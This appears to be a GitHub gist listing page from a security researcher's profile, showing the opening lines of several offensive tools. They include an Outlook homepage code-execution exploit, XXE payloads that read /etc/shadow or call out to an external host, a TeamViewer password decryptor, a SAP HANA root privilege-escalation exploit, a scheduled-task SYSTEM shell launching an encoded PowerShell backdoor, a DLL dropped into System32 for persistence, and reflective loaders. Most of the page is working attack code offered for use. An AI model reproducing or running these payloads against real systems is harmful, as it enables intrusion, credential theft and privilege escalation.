Skip to content

Instantly share code, notes, and snippets.

View S3cur3Th1sSh1t's full-sized avatar

S3cur3Th1sSh1t

3k followers · 171 following
View GitHub Profile
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / PowerView-3.0-tricks.ps1
Created June 30, 2017 07:00 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / RulerRCE
Last active October 2, 2021 20:29
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / XXE_Payloads
Last active October 2, 2021 20:29
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Direct XXE Windows
Last active February 29, 2024 20:25
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Teamviewer_Decrypt.py
Created February 3, 2020 19:24
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / CVE-2019-0357 - SAP-HANA root
Created February 6, 2020 08:04
CVE-2019-0357 - SAP-HANA root privesc vuln
import os
import signal
import sys
ATTEMPTS = (100 * 1000)
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / SystemShell.ps1
Last active April 20, 2021 12:01
$confirmpreference = "none"
function Get-ScheduledTaskSystem
{
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
$action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / PsexecReflective.ps1
Created March 28, 2020 11:49
This file has been truncated, but you can view the full file.
function reflectit
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.
1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Ualapi.ps1
Created March 29, 2020 11:13
function Ualapi
{
Write-Host "Dropping ualapi.dll in System32 Folder..."
if ([Environment]::Is64BitProcess)
{
[IO.File]::WriteAllBytes("C:\Windows\System32\ualapi.dll",[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADkY6HBoALPkqACz5KgAs+SFGjOk6ICz5IUaMqTsALPkhRoy5OpAs+SFGjMk6MCz5LFZM6TpwLPkqACzpLjAs+S1GnKk6ICz5LUac+ToQLPktRpMJKhAs+S1GnNk6ECz5JSaWNooALPkgAAAAAAAAAAAAAAAAAAAABQRQAAZIYKAMimf14AAAAAAAAAAPAAIiALAg4UAIgAAAB4AAAAAAAAehMBAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAABgAgAABAAAAAAAAAMAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAMwBAJQBAADYEwIAZAAAAABAAgA8BAAAAOABAEwdAAAAAAAAAAAAAABQAgBoAAAAsLcBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwtwEACAEAAAAAAAAAAAAAABACANgDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dGJzcwAAAQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAADgLnRleHQAAAAThwAAABABAACIAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAlC0AAA
@S3cur3Th1sSh1t
S3cur3Th1sSh1t / GetWinLogonTokenSystem.ps1
Last active February 27, 2022 15:34
function GetWinLogonTokenSystem
{
function reflectbin
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,